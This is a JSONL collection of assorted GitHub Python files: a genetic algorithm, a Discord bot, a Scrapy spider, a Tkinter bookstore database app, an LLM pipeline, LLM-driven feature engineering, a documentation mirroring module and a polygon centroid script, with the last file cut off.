+{"seq_id":"16543468536","text":"import numpy as np\nimport collections\nfrom Darwin import Darwin\n\n''' The genetic_algorithm class contains the functionality to train a neural network using a genetic algorithm.\n This class is a child of the Darwin superclass and provides implementations of the evolve, select_parents, \n crossover and mutate methods.'''\n\nclass genetic_algorithm(Darwin):\n def create_instance(population_size, nodes_per_layer, activation_function, problem_type):\n obj = genetic_algorithm(population_size, nodes_per_layer, activation_function, problem_type)\n\n # Assign initial variance for mutation\n for i in range(len(obj.population)):\n obj.population[i].append(np.random.uniform(0, 1))\n return obj\n\n # Perform steps of evolution (select parents, then perform crossover, then mutate).\n def evolve(self, mutation_prob, crossover_prob, k, validation_data):\n np.random.shuffle(self.population)\n\n # Select parents\n parents = self.select_parents(k, validation_data)\n offspring = []\n half_size = int(len(self.population)/2)\n\n # Perform crossover\n for i in range(half_size):\n if np.random.uniform(0, 1) < crossover_prob:\n children = self.crossover(parents[i], parents[i + half_size])\n else:\n children = collections.namedtuple('children', ['child1', 'child2'])(parents[i], parents[i + half_size])\n\n # Mutate children\n self.mutate(children.child1, mutation_prob)\n self.mutate(children.child2, mutation_prob)\n\n offspring.append(children.child1)\n offspring.append(children.child2)\n\n # Create the next generation using the fittest individuals from the parents and children\n self.replace(offspring, \"fittest\", validation_data)\n\n # Implementation of tournament based selection to choose parents, k = how many individuals compete in tournament\n def select_parents(self, k, validation_data):\n selected_individuals = []\n\n # Perform |population| tournaments\n for i in range(self.population_size):\n competitors = []\n fitness = []\n\n # Randomly select k individuals to compete in tournament\n for j in range(k):\n index = np.random.randint(0, self.population_size)\n competitors.append(self.population[index])\n fitness.append(self.fitness(self.population[index][0:-1], validation_data))\n\n # Select winner of the tournament\n winner = np.argmin(fitness)\n selected_individuals.append(competitors[winner])\n\n return selected_individuals\n\n # Mutation using normal distribution\n def mutate(self, individual, mutation_prob):\n for i in range(len(individual) - 1):\n if np.random.uniform(0, 1) < mutation_prob:\n individual[i] += np.random.normal(0, 0.5)\n\n # One point crossover\n def crossover(self, ind1, ind2):\n pt = np.random.randint(0, len(ind1))\n\n child1 = ind1[:pt] + ind2[pt:len(ind2)]\n child2 = ind2[:pt] + ind1[pt:len(ind1)]\n\n return collections.namedtuple('children', ['child1', 'child2'])(child1, child2)\n","repo_name":"senecal-jjs/GA_EVOLVE_MLP","sub_path":"Genetic.py","file_name":"Genetic.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30245241780","text":"import os\nimport discord\nfrom keep_alive import keep_alive\n\nfrom commands import onMessage\n\nsecretToken = os.environ['TOKEN']\n\nbot = discord.Client()\n\n@bot.event\nasync def on_ready():\n print(\"Another Day, another adventure for the {0.user}\".format(bot))\n\n@bot.event\nasync def on_message(message):\n # Ignore messages send by bot\n if message.author == bot:\n return\n\n await onMessage(message)\n\n\nkeep_alive()\nbot.run(secretToken)","repo_name":"DawidDylus/CartographerBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17762412612","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom webcrawling.items import *\n\nclass MasseffectSpider(scrapy.Spider):\n name = \"massEffect\"\n allowed_domains = [\"tfaw.com\"]\n start_urls = (\n 'http://www.tfaw.com/Companies/Dark-Horse/Series?series_name=Massive',\n )\n\n def parse(self, response):\n #print (response.xpath('//a[@class=\"regularlinksmallbold product-profile-link\"]/@href').extract())\n for i in response.xpath('//a[@class=\"regularlinksmallbold product-profile-link\"]/text()').extract():\n url = response.urljoin(i)\n yield scrapy.Request(url, callback=self.parse_detail_page)\n #pass\n\n def parse_detail_page(self, response):\n \tdata = WebcrawlingItem()\n \tdata['title'] = response.xpath('//span[@class=\"blackheader\" and @itemprop=\"name\"]/text()').extract()\n \t#data['price'] = response.css('span.blackheader ~ span.redheader::text').re('[$]\\d+\\.\\d+')\n \t#data['upc'] = response.xpath(‘...’).extract()\n \t#data['url'] = response.url\n \tyield data \n","repo_name":"ngtcs1989/Web-Scraping","sub_path":"Web_crawlers/webcrawling/spiders/massEffect.py","file_name":"massEffect.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28418936377","text":"from tkinter import *\nimport sqlite3\nfrom tkinter import ttk\n\n# Creation ad sizing of the GUI\nroot = Tk()\nroot.title(\"Book Store Manager\")\nroot.geometry(\"850x350\")\nspace = Text(root)\n\n# Creating a connection to the database\nconn = sqlite3.connect('library.db')\n# Create cursor\ncur = conn.cursor()\n\n# Calling the execute() method to create table and perform SQL commands\n# Create table\ncur.execute(\"\"\"create table if not exists books (\n id integer PRIMARY KEY,\n title text,\n author text,\n year integer,\n isbn integer\n)\n\"\"\")\n# Commit Changes\nconn.commit()\n# Close connection\nconn.close()\n\nupdate_id = None\n\n\n# Create Submit Function for database\ndef addEntry():\n \"\"\"\n Adds or updates the book details to the database\n\n :return: void\n \"\"\"\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n idd = update_id\n if idd is None:\n # Insert into database\n cur.execute(\"INSERT INTO books VALUES (NULL, :title, :author, :yr, :isbn)\",\n {\n 'title': book_title.get(),\n 'author': author.get(),\n 'yr': yr.get(),\n 'isbn': isbn.get(),\n }\n )\n else:\n sql = 'update books set title= ?, author=?, year=?, isbn=? where id=?'\n cur.execute(sql, (book_title.get(), author.get(), yr.get(), isbn.get(), idd))\n\n conn.commit()\n conn.close()\n # Clear inputs from form\n clear_input()\n view_all()\n\n\ndef view_all():\n \"\"\"\n Displays all the saved books in the database\n\n :return:void\n \"\"\"\n view_table.delete(*view_table.get_children())\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n\n # Query the database\n cur.execute(\"select * from books\")\n records = cur.fetchall()\n\n for record in records:\n view_table.insert('', 'end', values=record)\n\n conn.commit()\n conn.close()\n\n\ndef delete():\n \"\"\"\n Deletes selected book from the database by id\n\n :return: void\n \"\"\"\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n selected_item = view_table.item(view_table.focus())\n delete_id = selected_item.get('values')[0]\n\n # Delete from database\n cur.execute(\"delete from books where id=?\", (delete_id,))\n conn.commit()\n conn.close()\n view_all()\n\n\ndef search():\n \"\"\"\n Prints search result according to search string and type of search.\n\n :return: void\n \"\"\"\n view_table.delete(*view_table.get_children())\n\n select = callback()\n\n if select is 'id':\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n cur.execute(\"select * from books where id=?\", (search_entry.get(),))\n results = cur.fetchall()\n for result in results:\n view_table.insert('', 'end', values=result)\n conn.commit()\n conn.close()\n else:\n conn = sqlite3.connect('library.db')\n cur = conn.cursor()\n sql = str('select * from books where ' + select + ' like (?)')\n cur.execute(sql, (\"%\" + search_entry.get() + \"%\",))\n results = cur.fetchall()\n for result in results:\n view_table.insert('', 'end', values=result)\n conn.commit()\n conn.close()\n\n\ndef update():\n \"\"\"\n Places selected book in input entry to be edited\n\n :return: void\n \"\"\"\n clear_input()\n selected_item = view_table.item(view_table.focus())\n global update_id\n update_id = selected_item.get('values')[0]\n book_title.insert(0, selected_item.get('values')[1])\n author.insert(0, selected_item.get('values')[2])\n yr.insert(0, selected_item.get('values')[3])\n isbn.insert(0, selected_item.get('values')[4])\n\n\ndef clear_input():\n \"\"\"\n Clears all input from entry boxes\n :return: void\n \"\"\"\n book_title.delete(0, END)\n author.delete(0, END)\n yr.delete(0, END)\n isbn.delete(0, END)\n update_id = None\n\n\ndef callback(*args):\n \"\"\"\n Gets string selection from dropdown selector ;\n :param args:\n :return: string\n\n \"\"\"\n return opt_variable.get()\n\n\n# Create text boxes for the user entry\nbook_title = Entry(root, width=20)\nbook_title.grid(row=0, column=1, pady=10)\nauthor = Entry(root, width=20)\nauthor.grid(row=0, column=3, pady=10)\nyr = Entry(root, width=20)\nyr.grid(row=1, column=1, pady=10)\nisbn = Entry(root, width=20)\nisbn.grid(row=1, column=3, pady=10)\nsearch_entry = Entry(root, width=70)\nsearch_entry.grid(row=2, column=0, columnspan=1)\n\n# Create text box labels\nbook_title_label = Label(root, text=\"Title\")\nbook_title_label.grid(row=0, column=0, padx=30)\nauthor_label = Label(root, text=\"Author\")\nauthor_label.grid(row=0, column=2, padx=30)\nyr_label = Label(root, text=\"Year\")\nyr_label.grid(row=1, column=0, padx=30)\nisbn_label = Label(root, text=\"ISBN\")\nisbn_label.grid(row=1, column=2, padx=30)\nsearch_label = Label(root, text=\"Search by:\")\nsearch_label.grid(row=2, column=1, padx=30)\n\nOptionList = [\n \"id\",\n \"id\",\n \"title\",\n \"author\",\n \"year\",\n \"isbn\"\n]\noption_frame = Frame(root, bd=1, bg='cyan')\noption_frame.grid(row=2, column=2)\nopt_variable = StringVar(root)\nopt_variable.set('???')\nopt = ttk.OptionMenu(option_frame, opt_variable, *OptionList)\nopt.config(width=10)\nopt.pack(side=\"top\")\noption_select = 'id'\nopt_variable.trace(\"w\", callback)\n\n# Creating the execution buttons\nview_all_btn = Button(root, text=\"View all\", font=('arial', 10, 'bold'), width=15, command=view_all)\nview_all_btn.grid(row=3, column=3)\nsearch_entry_btn = Button(root, text=\"Search entry\", font=('arial', 10, 'bold'), width=15, command=search)\nsearch_entry_btn.grid(row=2, column=3)\nadd_entry_btn = Button(root, text=\"Add entry\", font=('arial', 10, 'bold'), width=15, command=addEntry)\nadd_entry_btn.grid(row=5, column=3)\nupdate_selected_btn = Button(root, text=\"Update Selected\", font=('arial', 10, 'bold'), width=15, command=update)\nupdate_selected_btn.grid(row=6, column=3)\ndelete_selected_btn = Button(root, text=\"Delete selected\", font=('arial', 10, 'bold'), width=15, command=delete)\ndelete_selected_btn.grid(row=7, column=3)\nclose_btn = Button(root, text=\"Close\", font=('arial', 10, 'bold'), width=15, command=root.destroy)\nclose_btn.grid(row=8, column=3)\n\n# Adding the display label\ndata_entry_frame = Frame(root, bd=1, width=400, height=250, bg=\"cyan\")\ndata_entry_frame.grid(row=3, rowspan=6, columnspan=3)\n\n# frm = Frame(root)\nview_table = ttk.Treeview(data_entry_frame, selectmode='browse')\nview_table.pack(side='left', fill='x')\nscrollbar = ttk.Scrollbar(data_entry_frame,\n orient=\"vertical\",\n command=view_table.yview)\nscrollbar.pack(side='right', fill='y')\nview_table.configure(xscrollcommand=scrollbar.set)\n# Defining number of columns\nview_table[\"columns\"] = (\"0\", \"1\", \"2\", \"3\", \"4\")\n# Defining heading\nview_table['show'] = 'headings'\nview_table.column(\"0\", width=10)\nview_table.column(\"3\", width=60)\n\nview_table.heading(0, text=\"Id\")\nview_table.heading(1, text=\"Title\")\nview_table.heading(2, text=\"Author\")\nview_table.heading(3, text=\"Year\")\nview_table.heading(4, text=\"Isbn\")\n\nroot.mainloop()\n","repo_name":"Chizyraky/bookstore-app","sub_path":"BookStore.py","file_name":"BookStore.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71830916906","text":"import torch\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\n\nfrom utils import Prompter\n\nclass pipeline(object):\n\n def __init__(self, model_path=None, gpu=False):\n self.model_path = model_path\n self.use_gpu = gpu\n self.prompter = Prompter()\n \n print(\"Loading model's weights ...\")\n self.load_model()\n\n def load_model(self):\n self.tokenizer = AutoTokenizer.from_pretrained(self.model_path)\n self.model = AutoModelForCausalLM.from_pretrained(\n self.model_path,\n torch_dtype=torch.bfloat16)\n \n if self.use_gpu:\n self.model.cuda()\n\n def to_cuda(self, inputs):\n return {k: v.cuda() for k, v in inputs.items()}\n\n def generate(self, instruction, prompt_input=None):\n prompt = self.prompter.generate_prompt(instruction, prompt_input)\n inputs = self.tokenizer(prompt, return_tensors='pt')\n if self.use_gpu:\n inputs = self.to_cuda(inputs)\n \n output = self.model.generate(\n **inputs,\n max_new_tokens=256,\n do_sample=True,\n top_p=0.75,\n top_k=40\n )\n output = self.tokenizer.decode(output[0], skip_special_tokens=True)\n response = self.prompter.get_response(output)\n return response\n","repo_name":"nlp-uoregon/Okapi","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"37"} +{"seq_id":"15416721693","text":"import imp\nfrom typing import Tuple, List\nfrom utils.util_functions import printc\nimport re\nimport os\n\ndef send_message(message: str, **kwargs) -> None:\n printc(source='[DATA SETUP WORKFLOW]', message=message, **kwargs)\n\n\n# endregion\ndef get_index_from_path(path: str) -> Tuple[int,int]:\n pattern = \"[0-9]{1,}-[0-9]{1,}\"\n x = re.findall(pattern,path)\n if len(x) != 1: send_message(f\"ERROR WHILE PARSING PATH: got {x} extracted from {path}, there should only be one\")\n\n first_index, second_index = x[0].split(\"-\")\n\n return int(first_index), int(second_index)\n\ndef get_key_of_path(path1: str) -> int:\n\n path1_i1, path1_i2 = get_index_from_path(path1)\n\n # print(f\"{path1}: {path1_i1},{path1_i2}\")\n\n return path1_i1 * 1000 + path1_i2\n\n\ndef sort_index(index: List[str]) -> List[str]:\n index.sort(key=get_key_of_path)\n return index\n\n\ndef create_index_for_dir(dir_path, index_path, file_ending = None,save=True,sort=True) -> List[str]:\n\n index = []\n\n for file in os.listdir(dir_path):\n if file_ending is not None:\n if file.endswith(file_ending):\n index.append(os.path.join(dir_path,file))\n else:\n index.append(os.path.join(dir_path,file))\n\n if sort: \n sort_index(index)\n\n if save:\n with open( index_path, 'w') as f:\n for path in index:\n f.write(\"%s\\n\" % path)\n\n return index\n","repo_name":"andfaxle/cAIsar-ai-cup","sub_path":"src/utils/path_utils.py","file_name":"path_utils.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18254609884","text":"import os\nimport copy\n\nimport openai\nfrom .evaluate import evaluate_dataset\nfrom .run_llm_code import run_llm_code\n\n\ndef get_prompt(\n df, ds, iterative=1, data_description_unparsed=None, samples=None, **kwargs\n):\n how_many = (\n \"up to 10 useful columns. Generate as many features as useful for downstream classifier, but as few as necessary to reach good performance.\"\n if iterative == 1\n else \"exactly one useful column\"\n )\n return f\"\"\"\nThe dataframe `df` is loaded and in memory. Columns are also named attributes.\nDescription of the dataset in `df` (column dtypes might be inaccurate):\n\"{data_description_unparsed}\"\n\nColumns in `df` (true feature dtypes listed here, categoricals encoded as int):\n{samples}\n \nThis code was written by an expert datascientist working to improve predictions. It is a snippet of code that adds new columns to the dataset.\nNumber of samples (rows) in training dataset: {int(len(df))}\n \nThis code generates additional columns that are useful for a downstream classification algorithm (such as XGBoost) predicting \\\"{ds[4][-1]}\\\".\nAdditional columns add new semantic information, that is they use real world knowledge on the dataset. They can e.g. be feature combinations, transformations, aggregations where the new column is a function of the existing columns.\nThe scale of columns and offset does not matter. Make sure all used columns exist. Follow the above description of columns closely and consider the datatypes and meanings of classes.\nThis code also drops columns, if these may be redundant and hurt the predictive performance of the downstream classifier (Feature selection). Dropping columns may help as the chance of overfitting is lower, especially if the dataset is small.\nThe classifier will be trained on the dataset with the generated columns and evaluated on a holdout set. The evaluation metric is accuracy. The best performing code will be selected.\nAdded columns can be used in other codeblocks, dropped columns are not available anymore.\n\nCode formatting for each added column:\n```python\n# (Feature name and description)\n# Usefulness: (Description why this adds useful real world knowledge to classify \\\"{ds[4][-1]}\\\" according to dataset description and attributes.)\n# Input samples: (Three samples of the columns used in the following code, e.g. '{df.columns[0]}': {list(df.iloc[:3, 0].values)}, '{df.columns[1]}': {list(df.iloc[:3, 1].values)}, ...)\n(Some pandas code using {df.columns[0]}', '{df.columns[1]}', ... to add a new column for each row in df)\n```end\n\nCode formatting for dropping columns:\n```python\n# Explanation why the column XX is dropped\ndf.drop(columns=['XX'], inplace=True)\n```end\n\nEach codeblock ends with ```end and starts with \"```python\"\nEach codeblock either generates {how_many} or drops bad columns (Feature selection).\nCodeblock:\n\"\"\"\n\n\ndef build_prompt(ds, df, iterative=1):\n data_description_unparsed = ds[-1]\n feature_importance = {} # xgb_eval(_obj)\n\n samples = \"\"\n df_ = df.head(10)\n for i in list(df_):\n # show the list of values\n nan_freq = \"%s\" % float(\"%.2g\" % (df[i].isna().mean() * 100))\n s = df_[i].tolist()\n if str(df[i].dtype) == \"float64\":\n s = [round(sample, 2) for sample in s]\n samples += (\n f\"{df_[i].name} ({df[i].dtype}): NaN-freq [{nan_freq}%], Samples {s}\\n\"\n )\n\n kwargs = {\n \"data_description_unparsed\": data_description_unparsed,\n \"samples\": samples,\n \"feature_importance\": {\n k: \"%s\" % float(\"%.2g\" % feature_importance[k]) for k in feature_importance\n },\n }\n\n prompt = get_prompt(\n df,\n ds,\n data_description_unparsed=data_description_unparsed,\n iterative=iterative,\n samples=samples,\n )\n\n return prompt\n\n\ndef generate_features(\n ds,\n df,\n model=\"gpt-3.5-turbo\",\n just_print_prompt=False,\n iterative=1,\n metric_used=None,\n iterative_method=\"logistic\",\n display_method=\"markdown\",\n):\n if display_method == \"markdown\":\n from IPython.display import display, Markdown\n\n def format_for_display(code):\n code = code.replace(\"```python\", \"\").replace(\"```\", \"\").replace(\"\", \"\")\n return code\n\n display_method = lambda x: display(Markdown(x))\n else:\n display_method = print\n\n assert (\n iterative == 1 or metric_used is not None\n ), \"metric_used must be set if iterative\"\n\n # Split ds into ds_train and ds_valid\n if iterative > 1:\n df_train, df_valid = (\n df.iloc[: int(len(df) * 0.7)],\n df.iloc[int(len(df) * 0.3) :],\n )\n else:\n df_train, df_valid = df, None\n\n prompt = build_prompt(ds, df_train, iterative=iterative)\n\n if just_print_prompt:\n code, prompt = None, prompt\n return code, prompt, None\n\n messages = [\n {\n \"role\": \"system\",\n \"content\": \"You are an expert datascientist assistant solving Kaggle problems. You answer only by generating code. Answer as concisely as possible.\",\n },\n {\n \"role\": \"user\",\n \"content\": prompt,\n },\n ]\n display_method(f\"*Dataset description:*\\n {ds[-1]}\")\n\n n_iter = iterative\n full_code = \"\"\n for i in range(n_iter):\n try:\n completion = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n stop=[\"```end\"],\n temperature=0.5,\n max_tokens=500,\n )\n code = completion[\"choices\"][0][\"message\"][\"content\"]\n code = code.replace(\"```python\", \"\").replace(\"```\", \"\").replace(\"\", \"\")\n except Exception as e:\n display_method(\"Error in code generation.\" + str(e))\n continue\n\n if iterative:\n df_train_extended = copy.deepcopy(df_train)\n df_valid_extended = copy.deepcopy(df_valid)\n try:\n df_train_extended = run_llm_code(\n code,\n df_train_extended,\n )\n df_valid_extended = run_llm_code(\n code,\n df_valid_extended,\n )\n\n result_old = evaluate_dataset(\n ds=ds,\n df_train=df_train,\n df_test=df_valid,\n prompt_id=\"XX\",\n name=ds[0],\n method=iterative_method,\n metric_used=metric_used,\n seed=0,\n )\n\n result_extended = evaluate_dataset(\n ds=ds,\n df_train=df_train_extended,\n df_test=df_valid_extended,\n prompt_id=\"XX\",\n name=ds[0],\n method=iterative_method,\n metric_used=metric_used,\n seed=0,\n )\n except Exception as e:\n display_method(\"Error in code execution.\")\n messages += [\n {\"role\": \"assistant\", \"content\": code},\n {\n \"role\": \"user\",\n \"content\": f\"\"\"Code execution of {code} failed with error: {e}. Next feature:\n ```python\n \"\"\",\n },\n ]\n continue\n\n # importances = get_leave_one_out_importance(\n # df_train_extended,\n # df_valid_extended,\n # ds,\n # iterative_method,\n # metric_used,\n # )\n # \"\"\"ROC Improvement by using each feature: {importances}\"\"\"\n\n improvement_roc = result_extended[\"roc\"] - result_old[\"roc\"]\n improvement_acc = result_extended[\"acc\"] - result_old[\"acc\"]\n\n add_feature = True\n add_feature_sentence = (\n \"The code was executed and changes to ´df´ were retained.\"\n )\n if improvement_roc + improvement_acc < 0:\n add_feature = False\n add_feature_sentence = f\"The last code changes to ´df´ were discarded. (Improvement: {improvement_roc + improvement_acc})\"\n\n display_method(\n \"\\n\"\n + f\"*Iteration {i+1}*\\n\"\n + f\"```python\\n{format_for_display(code)}\\n```\\n\"\n + f'Performance before adding features ROC {result_old[\"roc\"]:.3f}, ACC {result_old[\"acc\"]:.3f}.\\n'\n + f'Performance after adding features ROC {result_extended[\"roc\"]:.3f}, ACC {result_extended[\"acc\"]:.3f}.\\n'\n + f\"Improvement ROC {improvement_roc:.3f}, ACC {improvement_acc:.3f}.\\n\"\n + f\"{add_feature_sentence}\\n\"\n + f\"\\n\"\n )\n\n if len(code) > 10:\n messages += [\n {\"role\": \"assistant\", \"content\": code},\n {\n \"role\": \"user\",\n \"content\": f\"\"\"Performance after adding feature ROC {result_extended[\"roc\"]:.3f}, ACC {result_extended[\"acc\"]:.3f}. {add_feature_sentence}\nNext codeblock:\n\"\"\",\n },\n ]\n if add_feature or iterative == 1:\n df_train = df_train_extended\n df_valid = df_valid_extended\n full_code += code\n\n # if just_print_prompt:\n # code, prompt = None, howto_prompt.get_prompt(**kwargs)\n # else:\n # code, prompt = howto_prompt.get_prompt(**kwargs), howto_prompt(**kwargs)\n\n return full_code, prompt, messages\n","repo_name":"noahho/CAFE_Automated_Feature_Engineering","sub_path":"cafe.py","file_name":"cafe.py","file_ext":"py","file_size_in_byte":9662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18319705129","text":"# A valid parentheses string is either empty (\"\"), \"(\" + A + \")\", or A + B, where A and B are valid parentheses strings, and + represents string concatenation. \r\n\r\n#For example, \"\", \"()\", \"(())()\", and \"(()(()))\" are all valid parentheses strings.\r\n\r\n# A valid parentheses string S is primitive if it is nonempty, and there does not exist a way to split it into S = A+B, with A and B nonempty valid parentheses strings.\r\n\r\n# Given a valid parentheses string S, consider its primitive decomposition: S = P_1 + P_2 + ... + P_k, where P_i are primitive valid parentheses strings.\r\n\r\n# Return S after removing the outermost parentheses of every primitive string in the primitive decomposition of S.\r\n\r\nclass Solution(object):\r\n def removeOuterParentheses(self, S):\r\n list_stack = []\r\n count = 0\r\n for char in S:\r\n if char == \"(\":\r\n if count > 0:\r\n list_stack.append(char)\r\n count += 1\r\n if char == \")\":\r\n if count > 1:\r\n list_stack.append(char)\r\n count -= 1\r\n return \"\".join(list_stack)\r\n\r\n# learned how to use join! It's a bit weird compared to javascript","repo_name":"SLarkworthy/CodeChallenges","sub_path":"LeetCode/Stacks/removeOuterPeren.py","file_name":"removeOuterPeren.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17571941686","text":"#!/usr/bin/env python\n# coding: utf-8\n# yc@2013/03/20\n\n'''\n既非标准 github/svn 项目,又不是单一HTML文档的项目,只要它有在线文档可以看\n就可以用这一终极的 wget 镜像大法抓下来\n'''\n\nimport os\nimport re\nfrom offlinedoc.module._base import BaseModule, Version\n\n\nclass Module(BaseModule):\n '''\n '''\n # 唯一 id(格式要求同 Linux 文件名)\n name = 'redis'\n # 主页,获取 favicon 用(没有的话可以为 None)\n homepage = 'http://redis.io/'\n # 版本类型\n # normal: 递增,保留所有版本(例如:bootstrap)\n # latest: 递增,只保留最新版本(例如:jquery)\n # single: 只抓取一次,无论新旧(例如:sed)\n versioning = 'latest'\n\n def _new_versions(self, cur_ver):\n versions = [\n Version(i)\n for i in re.findall(r'http://download.redis.io/releases/redis-([\\.\\d]+).tar.gz', self.http_get(self.homepage))\n ]\n return [i for i in versions if i > cur_ver]\n\n def post_update(self, version, ret=None):\n '''\n 需要返回一个包含生成的 HTML 文档的目录地址\n '''\n # 先清空自己的源码目录\n self.clear_source()\n # 然后 wget 镜像,放到源码目录,限制只抓取 api.jquery.com 下链接\n ret = self.wget_mirror('http://redis.io/', self.source_dir, \\\n domains='redis.io')\n # 如果 wget 成功,先替换掉 html 中的外链(会减慢浏览速度),然后返回源码目录(含生成的 HTML 文档)\n if ret[0] in (0, 8):\n self.shell(r'find %s -name \"*.html\" -exec '\n 'sed -i \"/disqus.com\\/embed.js/d\" '\n '{} \\;' % self.source_dir)\n return self.source_dir\n","repo_name":"cj1324/OfflineDoc","sub_path":"offlinedoc/module/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12727127945","text":"# _ _ _ _ _ _ _ _ _ _ _ _\n# (c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c)\n# / ._. \\ / ._. \\ / ._. \\ / ._. \\ / ._. \\ / ._. \\\n# __\\( Y )/__ __\\( Y )/__ __\\( Y )/__ __\\( Y )/__ __\\( Y )/__ __\\( Y )/__\n# (_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)\n# || O || || O || || O || || O || || O || || O ||\n# _.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._\n# (.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)\n# `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-'\n\n###########################################################################\n# Author: Matt Fletcher #\n# PID: None #\n# Class: MAE273 Statics \t #\n# Helpers: None #\n# #\n# Program: Centroid of Polygon Calculator #\n# Due Date: #\n# #\n# Language: Python 2.7.6 #\n# IDE: Python in Terminal #\n# #\n# Purpose: Given XY Coordinates for a shape, calculates the centroid #\n# #\n# \"Bugs\": Points come out skewed and flipped #\n# \"Undocumented features\": None. #\n###########################################################################\n\n#The change in this from the previous program is using an equation for the centroid of an N-sided polygon\n#Link is here https://en.wikipedia.org/wiki/Centroid#Centroid_of_a_polygon\n\n#####################################################\n# Imports\t\t\t\t\t\t#\n#####################################################\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\n\n\n#####################################################\n# Setup\t\t\t \t\t#\n#####################################################\n\n#Set empty list for coordinates\nx,y =[],[]\n\n#Importing csv data \nwith open(\"russiadata.csv\", \"r\") as russiadataFile:\n\trussiadataReader = csv.reader(russiadataFile)\n\t\n\t#Create list of points\n\trussiadatalist = []\n\n\t#Import data\n\tfor row in russiadataReader:\n\t\t#While the rows have data, AKA length not equal to zero. \n\t\tif len(row) != 0: \n\t\t\t#Append data to arrays created above\n\t\t\tx.append(float(row[0]))\n\t\t\ty.append(float(row[1]))\n\n#Close file as importing is done\nrussiadataFile.close\n\n\n\n\n#####################################################\n# Data Analysis\t\t\t\t\t#\n#####################################################\n\n#Convert list to array for computations\nx=np.array(x)\ny=np.array(y)\n\n\n\n#Initialize area and x,y centroid to 0 for iteration. \narea = 0\nc_x = 0\nc_y = 0\n#For loop using equation from wikipedia\n\n#Area of polygon \nfor i in range(len(x)-1):\n\tarea_i = 0.5 * (x[i] * y[i+1]) - (x[i+1]*y[i])\n\tarea = area + area_i\n\n\nfor i in range(len(x)-1):\n\tc_xi = (x[i]+x[i+1]) * (x[i]*y[i+1] - x[i+1]*y[i])\n\tc_x = c_x+c_xi\n\nc_x = c_x/(6*area)\n\nfor i in range(len(y)-1):\n\tc_yi = (y[i]+y[i+1]) * (y[i]*x[i+1] - y[i+1]*x[i])\n\tc_y = c_y+c_yi\nc_y = c_y/(6*area)\n\n\nprint ('Centroid is at %f, %f',c_x,c_y)\n\n#####################################################\n# Plotting \t\t\t\t\t#\n#####################################################\n\n\n#Plot all points in data\nplt.xkcd()\nplt.plot(x,y, \"-.\")\n\n#Plot centroid and label it\nplt.plot(c_x,c_y,'^')\n\n\nplt.ymax=max(x)\n#Add axis labels\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"russia\")\n\n#Show the plot\nplt.show()\n\n\n\n\n\n\n#Use this to convert image to xy points\n#http://imagej.1557.x6.nabble.com/Obtaining-X-Y-coordinates-from-an-image-td3692369.html\n","repo_name":"MatthewFletcher/centroid","sub_path":"xypolygon.py","file_name":"xypolygon.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14210611832","text":"import sys\nsys.path.append('../../')\n\nfrom tasks.cbt.pipeline import *\nfrom tasks.cbt.modules import *\nfrom tproc.utils import *\nfrom tasks.cbt.dictionary import Dictionary\n\nfrom tqdm import tqdm\n\nimport re\n\n\nFIELDS = [ 'context', 'query', 'answer', 'candidates' ]\n#DSETS = [ 'train', 'test', 'valid' ]\nDSETS = [ 'test', 'valid' ]\n#DSETS = [ 'valid' ]\nPICKLES = [ 'data.NE', 'lookup.NE', 'metadata.NE' ]\n\nPATH = '../../../datasets/CBTest/data/'\n\n\n# separate items from text\ndef _read_sample(sample):\n lines = sample.splitlines()\n context = ''\n for line in lines[:-1]:\n context += line.lstrip('0123456789')\n query = lines[-1].split('\\t')[0].lstrip('21')\n candidates = lines[-1].split('\\t')[-1]\n answer = lines[-1].split('\\t')[1]\n return context, query, candidates, answer\n\n\n# read from file\n# returns structured text\ndef fetch_samples(path):\n # open file\n with open(path) as f:\n #raw_data = rtext_pipeline(f.read())\n raw_data = f.read()\n samples = raw_data.split('\\n\\n')[:-1]\n\n return samples\n\n# text sample to data item\ndef process_sample(sample, lookup, candidate_lookup):\n \n vocab = lookup.i2w\n # get candidates\n candidates = sample.splitlines()[-1].split('\\t')[-1].split('|')\n answer = sample.splitlines()[-1].split('\\t')[1].strip()\n\n # filter candidates\n candidates = [ w for w in candidates if lookup.is_worthy(w) ]\n\n # update vocab\n for w in 